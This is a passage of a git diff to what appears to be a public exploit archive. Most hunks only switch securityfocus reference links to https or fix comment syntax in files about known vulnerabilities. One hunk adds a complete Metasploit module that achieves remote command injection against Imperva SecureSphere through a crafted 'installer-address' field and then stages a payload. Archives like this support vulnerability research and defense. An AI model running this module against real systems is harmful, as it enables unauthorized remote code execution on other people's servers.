b/exploits/linux/remote/35799.txt index 33500b002..8f0c6d0cf 100644 --- a/exploits/linux/remote/35799.txt +++ b/exploits/linux/remote/35799.txt @@ -1,4 +1,4 @@ -source: http://www.securityfocus.com/bid/47975/info +source: https://www.securityfocus.com/bid/47975/info Vordel Gateway is prone to a directory-traversal vulnerability because it fails to sufficiently sanitize user-supplied input. diff --git a/exploits/linux/remote/35801.txt b/exploits/linux/remote/35801.txt index a5025ed69..a6a7be7b8 100644 --- a/exploits/linux/remote/35801.txt +++ b/exploits/linux/remote/35801.txt @@ -1,4 +1,4 @@ -source: http://www.securityfocus.com/bid/48008/info +source: https://www.securityfocus.com/bid/48008/info Asterisk is prone to a user-enumeration weakness. diff --git a/exploits/linux/remote/35810.txt b/exploits/linux/remote/35810.txt index aca56e930..bc50b6213 100644 --- a/exploits/linux/remote/35810.txt +++ b/exploits/linux/remote/35810.txt @@ -1,4 +1,4 @@ -source: http://www.securityfocus.com/bid/48056/info +source: https://www.securityfocus.com/bid/48056/info The 'libxml2' library is prone to multiple memory-corruption vulnerabilities, including one that can trigger a heap-based buffer-overflow error and an integer-overflow condition. diff --git a/exploits/linux/remote/35836.pl b/exploits/linux/remote/35836.pl index f86f5c95a..5faa6c33d 100755 --- a/exploits/linux/remote/35836.pl +++ b/exploits/linux/remote/35836.pl @@ -1,4 +1,4 @@ -source: http://www.securityfocus.com/bid/48167/info +source: https://www.securityfocus.com/bid/48167/info The Perl Data::FormValidator module is prone to a security-bypass vulnerability. diff --git a/exploits/linux/remote/36199.txt b/exploits/linux/remote/36199.txt index 7a053cbe3..7a4d68aa6 100644 --- a/exploits/linux/remote/36199.txt +++ b/exploits/linux/remote/36199.txt @@ -1,4 +1,4 @@ -source: http://www.securityfocus.com/bid/49911/info +source: https://www.securityfocus.com/bid/49911/info The Digest module for Perl is prone to a vulnerability that will let attackers inject and execute arbitrary Perl code. diff --git a/exploits/linux/remote/36352.txt b/exploits/linux/remote/36352.txt index fd75092a1..7afe45ad5 100644 --- a/exploits/linux/remote/36352.txt +++ b/exploits/linux/remote/36352.txt @@ -1,4 +1,4 @@ -source: http://www.securityfocus.com/bid/50802/info +source: https://www.securityfocus.com/bid/50802/info Apache HTTP Server is prone to a security-bypass vulnerability. diff --git a/exploits/linux/remote/36663.txt b/exploits/linux/remote/36663.txt index 9a644a119..a2d103802 100644 --- a/exploits/linux/remote/36663.txt +++ b/exploits/linux/remote/36663.txt @@ -1,4 +1,4 @@ -source: http://www.securityfocus.com/bid/51869/info +source: https://www.securityfocus.com/bid/51869/info Apache HTTP Server is prone to a security-bypass vulnerability. diff --git a/exploits/linux/remote/36884.py b/exploits/linux/remote/36884.py index 45c8f4f65..4587215c5 100755 --- a/exploits/linux/remote/36884.py +++ b/exploits/linux/remote/36884.py @@ -1,4 +1,4 @@ -source: http://www.securityfocus.com/bid/52175/info +source: https://www.securityfocus.com/bid/52175/info libpurple is prone to an information-disclosure vulnerability. diff --git a/exploits/linux/remote/37007.txt b/exploits/linux/remote/37007.txt index 40ea2bb8f..39965decd 100644 --- a/exploits/linux/remote/37007.txt +++ b/exploits/linux/remote/37007.txt @@ -1,4 +1,4 @@ -source: http://www.securityfocus.com/bid/52684/info +source: https://www.securityfocus.com/bid/52684/info AtMail is prone to multiple directory-traversal vulnerabilities, an arbitrary-file-upload vulnerability, and an information-disclosure vulnerability because the application fails to sanitize user-supplied input. diff --git a/exploits/linux/remote/37576.cpp b/exploits/linux/remote/37576.cpp index a10f22f6d..7df0fc94d 100644 --- a/exploits/linux/remote/37576.cpp +++ b/exploits/linux/remote/37576.cpp @@ -1,4 +1,4 @@ -source: http://www.securityfocus.com/bid/54816/info +source: https://www.securityfocus.com/bid/54816/info Calligra is prone to a remote buffer-overflow vulnerability. diff --git a/exploits/linux/remote/37788.py b/exploits/linux/remote/37788.py index 8c998ae02..05542b41c 100755 --- a/exploits/linux/remote/37788.py +++ b/exploits/linux/remote/37788.py @@ -1,4 +1,4 @@ -source: http://www.securityfocus.com/bid/55497/info +source: https://www.securityfocus.com/bid/55497/info libguac is prone to a remote buffer-overflow vulnerability. diff --git a/exploits/linux/remote/37834.py b/exploits/linux/remote/37834.py index 8457f1c41..1f75fb98d 100755 --- a/exploits/linux/remote/37834.py +++ b/exploits/linux/remote/37834.py @@ -1,4 +1,4 @@ -source: http://www.securityfocus.com/bid/55655/info +source: https://www.securityfocus.com/bid/55655/info Samba is prone to an unspecified remote code-execution vulnerability. diff --git a/exploits/linux/remote/3787.c b/exploits/linux/remote/3787.c index d4283aaf9..b7efe5607 100644 --- a/exploits/linux/remote/3787.c +++ b/exploits/linux/remote/3787.c @@ -7,7 +7,7 @@ ** Advanced exploitation in exec-shield (Fedora Core case study) ** URL: http://x82.inetcop.org/h0me/papers/FC_exploit/FC_exploit.txt ** -** Reference: http://www.securityfocus.com/bid/14794 (2005/09/09) +** Reference: https://www.securityfocus.com/bid/14794 (2005/09/09) ** http://labs.idefense.com/intelligence/vulnerabilities/display.php?id=303 ** ** -- diff --git a/exploits/linux/remote/37889.txt b/exploits/linux/remote/37889.txt index be15756aa..6399064f5 100644 --- a/exploits/linux/remote/37889.txt +++ b/exploits/linux/remote/37889.txt @@ -1,4 +1,4 @@ -source: http://www.securityfocus.com/bid/55685/info +source: https://www.securityfocus.com/bid/55685/info An attacker can exploit these issues to obtain sensitive information, to upload arbitrary code, and to run it in the context of the web server process. diff --git a/exploits/linux/remote/37949.txt b/exploits/linux/remote/37949.txt index 22cf53cc5..77bdfeb9c 100644 --- a/exploits/linux/remote/37949.txt +++ b/exploits/linux/remote/37949.txt @@ -1,4 +1,4 @@ -source: http://www.securityfocus.com/bid/56096/info +source: https://www.securityfocus.com/bid/56096/info ModSecurity is prone to a security-bypass vulnerability because it fails to sufficiently sanitize user-supplied input. diff --git a/exploits/linux/remote/38109.pl b/exploits/linux/remote/38109.pl index 5baa2b3c5..c6b97655e 100755 --- a/exploits/linux/remote/38109.pl +++ b/exploits/linux/remote/38109.pl @@ -1,4 +1,4 @@ -source: http://www.securityfocus.com/bid/56837/info +source: https://www.securityfocus.com/bid/56837/info MySQL and MariaDB are prone to a security-bypass weakness. diff --git a/exploits/linux/remote/3815.c b/exploits/linux/remote/3815.c index 37cef8d0d..3d0d1cd2f 100644 --- a/exploits/linux/remote/3815.c +++ b/exploits/linux/remote/3815.c @@ -7,7 +7,7 @@ ** Advanced exploitation in exec-shield (Fedora Core case study) ** URL: http://x82.inetcop.org/h0me/papers/FC_exploit/FC_exploit.txt ** -** Reference: http://www.securityfocus.com/bid/17678 +** Reference: https://www.securityfocus.com/bid/17678 ** vendor: http://streaming.polito.it/legacy_server ** ** -- diff --git a/exploits/linux/remote/38203.txt b/exploits/linux/remote/38203.txt index 1c795810d..cb11d95cb 100644 --- a/exploits/linux/remote/38203.txt +++ b/exploits/linux/remote/38203.txt @@ -1,4 +1,4 @@ -source: http://www.securityfocus.com/bid/57237/info +source: https://www.securityfocus.com/bid/57237/info Schmid Watson Management Console is prone to a directory-traversal vulnerability because it fails to sufficiently sanitize user-supplied input. diff --git a/exploits/linux/remote/3829.c b/exploits/linux/remote/3829.c index 753dae476..f6373ff52 100644 --- a/exploits/linux/remote/3829.c +++ b/exploits/linux/remote/3829.c @@ -7,7 +7,7 @@ ** Advanced exploitation in exec-shield (Fedora Core case study) ** URL: http://x82.inetcop.org/h0me/papers/FC_exploit/FC_exploit.txt ** -** Reference: http://www.securityfocus.com/bid/23545 +** Reference: https://www.securityfocus.com/bid/23545 ** vendor: http://3proxy.ru/ ** ** vade79/v9 v9@fakehalo.us (fakehalo/realhalo)'s exploit: diff --git a/exploits/linux/remote/38522.txt b/exploits/linux/remote/38522.txt index bb8e3ecdd..1e11ed9a4 100644 --- a/exploits/linux/remote/38522.txt +++ b/exploits/linux/remote/38522.txt @@ -1,4 +1,4 @@ -source: http://www.securityfocus.com/bid/60010/info +source: https://www.securityfocus.com/bid/60010/info thttpd is prone to a directory-traversal vulnerability because it fails to sufficiently sanitize user-supplied input. diff --git a/exploits/linux/remote/38680.html b/exploits/linux/remote/38680.html index 564385ed0..b2ed06e54 100644 --- a/exploits/linux/remote/38680.html +++ b/exploits/linux/remote/38680.html @@ -1,4 +1,4 @@ -source: http://www.securityfocus.com/bid/61491/info +source: https://www.securityfocus.com/bid/61491/info XMonad.Hooks.DynamicLog module for xmonad is prone to multiple remote command-injection vulnerabilities. diff --git a/exploits/linux/remote/38741.txt b/exploits/linux/remote/38741.txt index 102a642bc..18d258e9d 100644 --- a/exploits/linux/remote/38741.txt +++ b/exploits/linux/remote/38741.txt @@ -1,4 +1,4 @@ -source: http://www.securityfocus.com/bid/62024/info +source: https://www.securityfocus.com/bid/62024/info Nmap is prone to an arbitrary file-write vulnerability. diff --git a/exploits/linux/remote/38826.py b/exploits/linux/remote/38826.py index d4bed5a1d..48d389f82 100755 --- a/exploits/linux/remote/38826.py +++ b/exploits/linux/remote/38826.py @@ -1,4 +1,4 @@ -source: http://www.securityfocus.com/bid/63743/info +source: https://www.securityfocus.com/bid/63743/info Linux Kernel is prone to an information-disclosure vulnerability. diff --git a/exploits/linux/remote/39097.txt b/exploits/linux/remote/39097.txt index f4f53b295..f19cee03e 100644 --- a/exploits/linux/remote/39097.txt +++ b/exploits/linux/remote/39097.txt @@ -1,4 +1,4 @@ -source: http://www.securityfocus.com/bid/65587/info +source: https://www.securityfocus.com/bid/65587/info Red Hat Piranha is prone to a remote security bypass vulnerability. diff --git a/exploits/linux/remote/39155.txt b/exploits/linux/remote/39155.txt index 95518cef0..22d1f2fb5 100644 --- a/exploits/linux/remote/39155.txt +++ b/exploits/linux/remote/39155.txt @@ -1,4 +1,4 @@ -source: http://www.securityfocus.com/bid/67159/info +source: https://www.securityfocus.com/bid/67159/info lxml is prone to a security-bypass vulnerability. diff --git a/exploits/linux/remote/39196.py b/exploits/linux/remote/39196.py index 606cf43e3..54db18bf2 100755 --- a/exploits/linux/remote/39196.py +++ b/exploits/linux/remote/39196.py @@ -1,4 +1,4 @@ -source: http://www.securityfocus.com/bid/67534/info +source: https://www.securityfocus.com/bid/67534/info mod_wsgi is prone to a remote information-disclosure vulnerability. diff --git a/exploits/linux/remote/4162.c b/exploits/linux/remote/4162.c index 7a73d5704..ad60c6624 100644 --- a/exploits/linux/remote/4162.c +++ b/exploits/linux/remote/4162.c @@ -7,7 +7,7 @@ ** Advanced exploitation in exec-shield (Fedora Core case study) ** URL: http://x82.inetcop.org/h0me/papers/FC_exploit/FC_exploit.txt ** -** Reference: http://www.securityfocus.com/bid/22791 +** Reference: https://www.securityfocus.com/bid/22791 ** vendor: http://tomcat.apache.org/ ** ** eliteboy's exploit (SUSE, Debian, FreeBSD): diff --git a/exploits/linux/remote/4514.c b/exploits/linux/remote/4514.c index 3b1206f9f..ecff26cf3 100644 --- a/exploits/linux/remote/4514.c +++ b/exploits/linux/remote/4514.c @@ -1,6 +1,6 @@ /* Eggdrop Server Module Message Handling Remote Buffer Overflow Vulnerability - http://www.securityfocus.com/bid/24070 + https://www.securityfocus.com/bid/24070 discovered by Bow Sineath tested on eggdrop 1.6.18 / linux 2.4 diff --git a/exploits/linux/remote/46509.rb b/exploits/linux/remote/46509.rb new file mode 100755 index 000000000..5beeb7547 --- /dev/null +++ b/exploits/linux/remote/46509.rb @@ -0,0 +1,143 @@ +## +# This module requires Metasploit: https://metasploit.com/download +# Current source: https://github.com/rapid7/metasploit-framework +## + +class MetasploitModule < Msf::Exploit::Remote + Rank = ExcellentRanking + + include Msf::Exploit::Remote::HttpClient + include Msf::Exploit::CmdStager + + def initialize(info = {}) + super( + update_info( + info, + 'Name' => 'Imperva SecureSphere PWS Command Injection', + 'Description' => %q( + This module exploits a command injection vulnerability in Imperva + SecureSphere 13.x. The vulnerability exists in the PWS service, + where Python CGIs didn't properly sanitize user supplied command + parameters and directly passes them to corresponding CLI utility, + leading to command injection. Agent registration credential is + required to exploit SecureSphere in gateway mode. + + This module was successfully tested on Imperva SecureSphere 13.0/13.1/ + 13.2 in pre-ftl mode and unsealed gateway mode. + ), + 'License' => MSF_LICENSE, + 'Author' => + [ + 'rsp3ar gmail.com>' # Discovery/Metasploit Module + ], + 'References' => + [ + [ 'EDB', '45542' ] + ], + 'DisclosureDate' => "Oct 8 2018", + 'DefaultOptions' => { + 'SSL' => true, + 'PrependFork' => true, + }, + 'Platform' => 'linux', + 'Arch' => [ARCH_X86, ARCH_X64], + 'CmdStagerFlavor' => %w{ echo printf wget }, + 'Targets' => + [ + ['Imperva SecureSphere 13.0/13.1/13.2', {}] + ], + 'DefaultTarget' => 0)) + + register_options( + [ + Opt::RPORT(443), + OptString.new('USERNAME', [false, 'Agent registration username', 'imperva']), + OptString.new('PASSWORD', [false, 'Agent registration password', '']), + OptString.new('TARGETURI', [false, 'The URI path to impcli', '/pws/impcli']), + OptInt.new('TIMEOUT', [false, 'HTTP connection timeout', 15]) + ]) + register_advanced_options [ + OptBool.new('ForceExploit', [false, 'Override check result', false]) + ] + end + + def check + begin + res = execute_command('id') + rescue => e + vprint_error("#{e}") + return CheckCode::Unknown + end + + if res.body =~ /uid=\d+/ + return CheckCode::Vulnerable + end + + CheckCode::Safe + end + + def exploit + unless CheckCode::Vulnerable == check + unless datastore['ForceExploit'] + fail_with(Failure::NotVulnerable, 'Target is not vulnerable. Set ForceExploit to override.') + end + print_warning 'Target does not appear to be vulnerable' + end + + print_status("Sending payload #{datastore['PAYLOAD']}") + execute_cmdstager + end + + def execute_command(cmd, opts = {}) + data = { + 'command' => 'impctl server status', + 'parameters' => { + 'broadcast' => true, + 'installer-address' => "127.0.0.1 $(#{cmd})" + } + } + + res = send_request data + + return unless res + + if res.code == 401 + fail_with(Failure::NoAccess, 'Authorization Failure, valid agent registration credential is required') + end + + unless res.code == 406 && res.body.include?("impctl") + fail_with(Failure::Unknown, 'Server did not respond in an expected way') + end + + res + end + + def send_request(data) + req_params = { + 'method' => 'POST', + 'uri' => normalize_uri(target_uri.path), + 'data' => data.to_json + } + + if !datastore['USERNAME'].blank? && !datastore['PASSWORD'].blank? + unless @cookie + res = send_request_cgi({ + 'method' => 'GET', + 'uri' => normalize_uri('/') + }) + unless res + fail_with(Failure::Unreachable, "#{peer} - Connection failed") + end + + @cookie = res.get_cookies + end + + req_params['cookie'] = @cookie + req_params['headers'] = { + 'Authorization' => basic_auth(datastore['USERNAME'], datastore['PASSWORD']) + } + end + + send_request_cgi(req_params, datastore['TIMEOUT']) + end +end \ No newline at end of file diff --git a/exploits/linux/remote/74.c b/exploits/linux/remote/74.c index 23b608d86..dc4f0379d 100644 --- a/exploits/linux/remote/74.c +++ b/exploits/linux/remote/74.c @@ -1,4 +1,4 @@ - /* +/* ** ** wu-ftpd v2.6.2 off-by-one remote 0day exploit. ** diff --git a/exploits/linux/remote/940.c b/exploits/linux/remote/940.c index af8c1ec1f..6d8eeaa1c 100644 --- a/exploits/linux/remote/940.c +++ b/exploits/linux/remote/940.c @@ -1,4 +1,4 @@ - /*[ sumus[v0.2.2]: (httpd) remote buffer overflow exploit. ]**** +/*[ sumus[v0.2.2]: (httpd) remote buffer overflow exploit. ]**** * * * by: vade79/v9 v9@fakehalo.us (fakehalo/realhalo) * * * diff --git a/exploits/linux/webapps/20706.rb b/exploits/linux/webapps/20706.rb index 669fc6223..75a993b3a 100755 --- a/exploits/linux/webapps/20706.rb +++ b/exploits/linux/webapps/20706.rb @@ -26,7 +26,7 @@ class Metasploit3 < Msf::Auxiliary [ 'CVE', '2012-2977' ], [ 'OSVDB', '0' ], [ 'BID', '54430' ], - [ 'URL', 'http://www.securityfocus.com/bid/54430' ], + [ 'URL', 'https://www.securityfocus.com/bid/54430' ], ], 'DisclosureDate' => "Jul 23 2012" )) diff --git a/exploits/linux/webapps/30286.txt b/exploits/linux/webapps/30286.txt index 2f803ecce..a0c6e3c08 100644 --- a/exploits/linux/webapps/30286.txt +++ b/exploits/linux/webapps/30286.txt @@ -1,4 +1,4 @@ -source: http://www.securityfocus.com/bid/24853/info +source: https://www.securityfocus.com/bid/24853/info ImgSvr is prone to a local file-include vulnerability because it fails to sanitize user-supplied input. diff --git a/exploits/linux_x86-64/dos/21224.c b/exploits/linux_x86-64/dos/21224.c index cbff30b60..3da019de3 100644 --- a/exploits/linux_x86-64/dos/21224.c +++ b/exploits/linux_x86-64/dos/21224.c @@ -1,5 +1,5 @@ /* -source: http://www.securityfocus.com/bid/55471/info +source: https://www.securityfocus.com/bid/55471/info Oracle VM VirtualBox is prone to a local denial-of-service vulnerability. diff --git a/exploits/linux_x86-64/dos/33585.txt b/exploits/linux_x86-64/dos/33585.txt index 7dcfda278..4af783d69 100644 --- a/exploits/linux_x86-64/dos/33585.txt +++ b/exploits/linux_x86-64/dos/33585.txt @@ -1,4 +1,4 @@ -source: http://www.securityfocus.com/bid/38027/info +source: https://www.securityfocus.com/bid/38027/info The Linux kernel is prone to a local denial-of-service vulnerability. diff --git a/exploits/linux_x86-64/local/32751.c b/exploits/linux_x86-64/local/32751.c index 11dcc4e2d..a7bfd6595 100644 --- a/exploits/linux_x86-64/local/32751.c +++ b/exploits/linux_x86-64/local/32751.c @@ -1,5 +1,5 @@ /* -source: http://www.securityfocus.com/bid/33417/info +source: https://www.securityfocus.com/bid/33417/info Systrace is prone to a local privilege-escalation vulnerability. diff --git a/exploits/linux_x86/remote/20032.txt b/exploits/linux_x86/remote/20032.txt index 4c4f73629..a183b800b 100644 --- a/exploits/linux_x86/remote/20032.txt +++ b/exploits/linux_x86/remote/20032.txt @@ -1,4 +1,4 @@ -source: http://www.securityfocus.com/bid/1387/info +source: https://www.securityfocus.com/bid/1387/info Washington University ftp daemon (wu-ftpd) is a very popular unix ftp server shipped with many distributions of Linux and other UNIX operating systems. Wu-ftpd is vulnerable to a very serious remote attack in the SITE EXEC implementation. Because of user input going directly into a format string for a *printf function, it is possible to overwrite important data, such as a return address, on the stack. When this is accomplished, the function can jump into shellcode pointed to by the overwritten eip and execute arbitrary commands as root. While exploited in a manner similar to a buffer overflow, it is actually an input validation problem. Anonymous ftp is exploitable making it even more serious as attacks can come anonymously from anywhere on the internet. diff --git a/exploits/macos/dos/45891.c b/exploits/macos/dos/45891.c index 196667e05..b41ccc7e7 100644 --- a/exploits/macos/dos/45891.c +++ b/exploits/macos/dos/45891.c @@ -1,3 +1,4 @@ +/* # Exploit Title: MacOS 10.13 - 'workq_kernreturn' Denial of Service (PoC) # Date: 2018-07-30 # Exploit Author: Fabiano Anemone @@ -14,6 +15,7 @@ # Copyright © 2018 FABIANO ANEMONE (fabiano.anemone@gmail.com). All rights reserved. # Reported to product-security@apple.com on 7/30/18 # Fixed in Mojave. +*/ #include #include diff --git a/exploits/multiple/dos/10077.txt b/exploits/multiple/dos/10077.txt index b0b79216d..9b12198b7 100644 --- a/exploits/multiple/dos/10077.txt +++ b/exploits/multiple/dos/10077.txt @@ -2,7 +2,7 @@ Attackers use readily available LDAP commands to exploit this issue. -source: http://www.securityfocus.com/bid/27778/info +source: https://www.securityfocus.com/bid/27778/info OpenLDAP is prone to a remote denial-of-service vulnerability. diff --git a/exploits/multiple/dos/15467.txt b/exploits/multiple/dos/15467.txt index ceb15e7d4..a81a0151f 100644 --- a/exploits/multiple/dos/15467.txt +++ b/exploits/multiple/dos/15467.txt @@ -1,4 +1,4 @@ -source: http://www.securityfocus.com/bid/42596/info +source: https://www.securityfocus.com/bid/42596/info MySQL is prone to a denial-of-service vulnerability. diff --git a/exploits/multiple/dos/15676.txt b/exploits/multiple/dos/15676.txt index 670db6199..8a12362a7 100644 --- a/exploits/multiple/dos/15676.txt +++ b/exploits/multiple/dos/15676.txt @@ -1,4 +1,4 @@ -source: http://www.securityfocus.com/bid/44987/info +source: https://www.securityfocus.com/bid/44987/info Wireshark is prone to a buffer-overflow vulnerability. diff --git a/exploits/multiple/dos/15898.py b/exploits/multiple/dos/15898.py index 0db22ce14..083cc346f 100755 --- a/exploits/multiple/dos/15898.py +++ b/exploits/multiple/dos/15898.py @@ -1,4 +1,4 @@ -# source: http://www.securityfocus.com/bid/45634/info +# source: https://www.securityfocus.com/bid/45634/info #!/usr/bin/env python diff --git a/exploits/multiple/dos/15973.txt b/exploits/multiple/dos/15973.txt index 4d932c949..9d34d011e 100644 --- a/exploits/multiple/dos/15973.txt +++ b/exploits/multiple/dos/15973.txt @@ -1,4 +1,4 @@ -Source: http://www.securityfocus.com/bid/44986/info +Source: https://www.securityfocus.com/bid/44986/info Wireshark is prone to a remote denial-of-service vulnerability because it fails to properly handle certain types of packets. diff --git a/exploits/multiple/dos/16108.txt b/exploits/multiple/dos/16108.txt index 35a5da3bb..9261ac81d 100644 --- a/exploits/multiple/dos/16108.txt +++ b/exploits/multiple/dos/16108.txt @@ -1,4 +1,4 @@ -Source: http://www.securityfocus.com/bid/46008/info +Source: https://www.securityfocus.com/bid/46008/info VLC media player is prone to a heap-based memory-corruption vulnerability. diff --git a/exploits/multiple/dos/17120.c b/exploits/multiple/dos/17120.c index 6e1bca93b..585983026 100644 --- a/exploits/multiple/dos/17120.c +++ b/exploits/multiple/dos/17120.c @@ -1,5 +1,5 @@ /* -source: http://www.securityfocus.com/bid/46563/info +source: https://www.securityfocus.com/bid/46563/info GNU glibc is prone to a stack-corruption vulnerability. diff --git a/exploits/multiple/dos/18758.txt b/exploits/multiple/dos/18758.txt index 5612789d8..038e54641 100644 --- a/exploits/multiple/dos/18758.txt +++ b/exploits/multiple/dos/18758.txt @@ -1,4 +1,4 @@ -source: http://www.securityfocus.com/bid/52735/info +source: https://www.securityfocus.com/bid/52735/info Wireshark is prone to a remote denial-of-service vulnerability caused by a NULL-pointer-dereference error. diff --git a/exploits/multiple/dos/18918.txt b/exploits/multiple/dos/18918.txt index d2cc5fbcf..da423e6d2 100644 --- a/exploits/multiple/dos/18918.txt +++ b/exploits/multiple/dos/18918.txt @@ -1,4 +1,4 @@ -source: http://www.securityfocus.com/bid/53652/info +source: https://www.securityfocus.com/bid/53652/info Wireshark is prone to a denial-of-service vulnerability because it fails to properly allocate memory. diff --git a/exploits/multiple/dos/18919.txt b/exploits/multiple/dos/18919.txt index aa5488b64..da236c171 100644 --- a/exploits/multiple/dos/18919.txt +++ b/exploits/multiple/dos/18919.txt @@ -1,4 +1,4 @@ -source: http://www.securityfocus.com/bid/53651/info +source: https://www.securityfocus.com/bid/53651/info Wireshark is prone to multiple denial-of-service vulnerabilities. diff --git a/exploits/multiple/dos/18920.txt b/exploits/multiple/dos/18920.txt index f37feb82a..3b22f189c 100644 --- a/exploits/multiple/dos/18920.txt +++ b/exploits/multiple/dos/18920.txt @@ -1,4 +1,4 @@ -source: http://www.securityfocus.com/bid/53653/info +source: https://www.securityfocus.com/bid/53653/info Wireshark is prone to a denial-of-service vulnerability. diff --git a/exploits/multiple/dos/19212.txt b/exploits/multiple/dos/19212.txt index e6ee579b7..27ce76561 100644 --- a/exploits/multiple/dos/19212.txt +++ b/exploits/multiple/dos/19212.txt @@ -1,4 +1,4 @@ -source: http://www.securityfocus.com/bid/267/info +source: https://www.securityfocus.com/bid/267/info A set of vulnerabilities in the counter.exe web hit counter program enables denial of service attacks. diff --git a/exploits/multiple/dos/19225.txt b/exploits/multiple/dos/19225.txt index 3fe309cca..cc5324517 100644 --- a/exploits/multiple/dos/19225.txt +++ b/exploits/multiple/dos/19225.txt @@ -1,4 +1,4 @@ -source: http://www.securityfocus.com/bid/282/info +source: https://www.securityfocus.com/bid/282/info A vulnerability in the Compaq Management Agents and the Compaq Survey Utility when running as an agent allows remote malicious users to steal local files. All Compaq Server and Client Management Agents version 4.0 or later are vulnerable. All Compaq Survey Utility versions 2.0 or later are vulnerable. diff --git a/exploits/multiple/dos/19228.pl b/exploits/multiple/dos/19228.pl index 05054fbb9..7d5062a61 100755 --- a/exploits/multiple/dos/19228.pl +++ b/exploits/multiple/dos/19228.pl @@ -1,4 +1,4 @@ -source: http://www.securityfocus.com/bid/286/info +source: https://www.securityfocus.com/bid/286/info Microsoft's JET database engine feature allows the embedding of Visual Basic for Application in SQL string expressions and the lack of metacharacter filtering by many web applications may allow remote users to execute commands on the system. diff --git a/exploits/multiple/dos/19230.txt b/exploits/multiple/dos/19230.txt index de5f555cf..26b0509bf 100644 --- a/exploits/multiple/dos/19230.txt +++ b/exploits/multiple/dos/19230.txt @@ -1,4 +1,4 @@ -source: http://www.securityfocus.com/bid/288/info +source: https://www.securityfocus.com/bid/288/info Servers running PCAnywhere32 with TCP/IP networking are subject to a Denial of Service attack that will hang the server at 100% CPU utilization. A malicious user may initiate this DoS by connecting to tcp port 5631 on the PCAnywhere server input a large amount of data when prompted with "Please press ". diff --git a/exploits/multiple/dos/19368.sh b/exploits/multiple/dos/19368.sh index 884f403dc..034637142 100755 --- a/exploits/multiple/dos/19368.sh +++ b/exploits/multiple/dos/19368.sh @@ -1,4 +1,4 @@ -source: http://www.securityfocus.com/bid/487/info +source: https://www.securityfocus.com/bid/487/info Lotus Notes SMTP MTA is susceptible to being used as a mail relay for SPAM or other unsolicited email. Connecting to the mail server (tcp25) and issuing a 'mail from' command with <> as the data may allow an unauthorized user to relay email via this server. diff --git a/exploits/multiple/dos/19377.txt b/exploits/multiple/dos/19377.txt index 3e2f43fd9..6f1bc1550 100644 --- a/exploits/multiple/dos/19377.txt +++ b/exploits/multiple/dos/19377.txt @@ -1,4 +1,4 @@ -source: http://www.securityfocus.com/bid/502/info +source: https://www.securityfocus.com/bid/502/info The imapd login process is susceptible to a buffer overflow attack which will crash the service. diff --git a/exploits/multiple/dos/19378.txt b/exploits/multiple/dos/19378.txt index 3a8abbcb6..1c196d96e 100644 --- a/exploits/multiple/dos/19378.txt +++ b/exploits/multiple/dos/19378.txt @@ -1,4 +1,4 @@ -source: http://www.securityfocus.com/bid/503/info +source: https://www.securityfocus.com/bid/503/info The IMail ldap service has an unchecked buffer, resulting in a classic buffer overflow vulnerability. While it does not crash the service, it drives CPU utilization up rendering the system essentially unusable. diff --git a/exploits/multiple/dos/19379.txt b/exploits/multiple/dos/19379.txt index e0085c5e5..c80b91306 100644 --- a/exploits/multiple/dos/19379.txt +++ b/exploits/multiple/dos/19379.txt @@ -1,4 +1,4 @@ -source: http://www.securityfocus.com/bid/504/info +source: https://www.securityfocus.com/bid/504/info The IMail IMonitor service can be crashed by exploiting a buffer overflow vulnerability. diff --git a/exploits/multiple/dos/19380.txt b/exploits/multiple/dos/19380.txt index 6911d545d..93136a7d5 100644 --- a/exploits/multiple/dos/19380.txt +++ b/exploits/multiple/dos/19380.txt @@ -1,4 +1,4 @@ -source: http://www.securityfocus.com/bid/505/info +source: https://www.securityfocus.com/bid/505/info The IMail web server can be crashed by requesting an abnormally long URL. diff --git a/exploits/multiple/dos/19382.txt b/exploits/multiple/dos/19382.txt index 722805cc2..473d29e2d 100644 --- a/exploits/multiple/dos/19382.txt +++ b/exploits/multiple/dos/19382.txt @@ -1,4 +1,4 @@ -source: http://www.securityfocus.com/bid/506/info +source: https://www.securityfocus.com/bid/506/info IMail's whois server can be crashed due to an unchecked buffer. diff --git a/exploits/multiple/dos/19446.pl b/exploits/multiple/dos/19446.pl index e24b45e81..f12f3b515 100755 --- a/exploits/multiple/dos/19446.pl +++ b/exploits/multiple/dos/19446.pl @@ -1,4 +1,4 @@ -source: http://www.securityfocus.com/bid/569/info +source: https://www.securityfocus.com/bid/569/info Specifying a negative content-length in a POST operation to the WebTrends Enterprise Reporting Server will crash the web server. diff --git a/exploits/multiple/dos/19457.txt b/exploits/multiple/dos/19457.txt index cfd97a1e4..53a82303d 100644 --- a/exploits/multiple/dos/19457.txt +++ b/exploits/multiple/dos/19457.txt @@ -1,6 +1,6 @@ Microsoft Commercial Internet System 2.0/2.5,IIS 4.0,Site Server Commerce Edition 3.0 alpha/3.0 i386 Malformed HTTP Request Header DoS -source: http://www.securityfocus.com/bid/579/info +source: https://www.securityfocus.com/bid/579/info Microsoft IIS and all other products that use the IIS web engine have a vulnerability whereby a flood of specially formed HTTP request headers will make IIS consume all available memory on the server and then hang. IIS activity will be halted until the flood ceases or the service is stopped and restarted. diff --git a/exploits/multiple/dos/19536.txt b/exploits/multiple/dos/19536.txt index c4e1a5f80..444f04947 100644 --- a/exploits/multiple/dos/19536.txt +++ b/exploits/multiple/dos/19536.txt @@ -1,6 +1,6 @@ Apache <= 1.1,NCSA httpd <= 1.5.2,Netscape Commerce Server 1.12/Communications Server 1.1/Enterprise Server 2.0 a nph-test-cgi Vulnerability -source: http://www.securityfocus.com/bid/686/info +source: https://www.securityfocus.com/bid/686/info Description as given by Josh Richards: diff --git a/exploits/multiple/dos/19571.c b/exploits/multiple/dos/19571.c index 9d4069c14..7e6afab5d 100644 --- a/exploits/multiple/dos/19571.c +++ b/exploits/multiple/dos/19571.c @@ -1,4 +1,4 @@ -source: http://www.securityfocus.com/bid/748/info +// source: https://www.securityfocus.com/bid/748/info Netscape Messaging server will not de-allocate memory that is used to store the RCPT TO information for an incoming email. By sending enough long RCPT TO addresses, the system can be forced to consume all available memory, leading to a denial of service. diff --git a/exploits/multiple/dos/19750.sh b/exploits/multiple/dos/19750.sh index f05e51f88..9c9f0d729 100755 --- a/exploits/multiple/dos/19750.sh +++ b/exploits/multiple/dos/19750.sh @@ -1,4 +1,4 @@ -source: http://www.securityfocus.com/bid/984/info +source: https://www.securityfocus.com/bid/984/info Simple connections and disconnections to Timbuktu ports can hang the authentication process and halt all Timbuktu services. To return to normal functionality, the Timbuktu process will need to be killed and the Timbuktu service is required to be stopped and restarted. diff --git a/exploits/multiple/dos/19780.txt b/exploits/multiple/dos/19780.txt index 4af17b9e4..74b7780ce 100644 --- a/exploits/multiple/dos/19780.txt +++ 